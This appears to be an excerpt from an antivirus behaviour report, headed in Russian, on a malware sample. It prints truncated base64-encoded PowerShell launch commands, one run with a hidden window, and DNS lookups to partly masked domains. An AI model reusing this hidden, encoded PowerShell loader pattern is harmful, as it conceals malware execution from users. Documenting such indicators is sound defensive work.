Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAA4AGIAeAAyADUAYwB4AGMANAA1AD0AJwBiADAAMAA2ADYAMABjADgANwAyAHgANgB4ACcAOwAkAGIAMAA3AGIAMAA...
- DNS ASK fi###epc.co.uk
- DNS ASK ch###ubinh.com
- DNS ASK ca########orealestatebyidarmis.com
- DNS ASK fi###arbi.lv
- DNS ASK sh####eparty.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAA4AGIAeAAyADUAYwB4AGMANAA1AD0AJwBiADAAMAA2ADYAMABjADgANwAyAHgANgB4ACcAOwAkAGIAMAA3AGIAMAA...' (со скрытым окном)